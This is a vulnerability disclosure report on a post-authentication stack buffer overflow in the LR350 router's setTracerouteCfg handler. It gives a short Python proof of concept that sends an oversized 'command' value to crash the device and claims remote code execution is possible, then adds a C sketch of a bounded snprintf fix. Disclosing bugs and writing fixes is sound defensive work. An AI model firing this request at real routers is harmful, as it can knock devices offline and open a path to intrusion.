Hi, we found a post-authentication stack buffer overflow in the **LR350** (firmware version V9.3.5u.6369_B20220309) and are contacting you at the first opportunity.


In the function **setTracerouteCfg** of the file /cgi-bin/cstecgi.cgi, the size of the `command` parameter is not checked, so a very long string overflows the stack buffer via sprintf.

PoC

```python
import requests

# Device under test on the lab network
url = "http://192.168.17.220:80/cgi-bin/cstecgi.cgi"
cookie = {"Cookie": "uid=1234"}
# "command" is 0x100 bytes long, longer than the handler's stack buffer
data = {"topicurl": "setTracerouteCfg",
        "command": "a" * 0x100}
response = requests.post(url, cookies=cookie, json=data)
print(response.text)
print(response)
```

The PC register can be hijacked, which means it can result in RCE.
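
The fix for this class of bug is to bound the formatting call and reject input that does not fit. The following C sketch is an added example, not code from the firmware or the vendor: the buffer size, the format string and the function names are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define CMD_BUF_SIZE 128            /* assumed; the page does not give the real size */
#define CMD_FMT "traceroute %s"     /* assumed format string, for illustration only */

/* Pattern the report describes (unbounded, so a long value runs past the buffer):
 *     char buf[CMD_BUF_SIZE];
 *     sprintf(buf, CMD_FMT, command);
 */

/* Bounded version: returns 0 on success, -1 if the value is missing or does not fit. */
int format_command_checked(char *dst, size_t dst_len, const char *command)
{
    int n;

    if (dst == NULL || dst_len == 0)
        return -1;
    dst[0] = '\0';
    if (command == NULL)
        return -1;
    n = snprintf(dst, dst_len, CMD_FMT, command);
    if (n < 0 || (size_t)n >= dst_len) {   /* snprintf reports the untruncated length */
        dst[0] = '\0';                      /* reject instead of using a truncated string */
        return -1;
    }
    return 0;
}

/* Constructed test input: a "command" value made of n 'a' characters. */
int try_command_of_length(size_t n)
{
    static char input[1024];
    char buf[CMD_BUF_SIZE];

    if (n >= sizeof input)
        return -2;
    memset(input, 'a', n);
    input[n] = '\0';
    return format_command_checked(buf, sizeof buf, input);
}

int main(void)
{
    printf("len 8     -> %d\n", try_command_of_length(8));
    printf("len 0x100 -> %d\n", try_command_of_length(0x100));
    return 0;
}
```

With these assumed sizes, the 0x100-byte value from the PoC is rejected before anything is written past the buffer, while values that fit are formatted normally.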
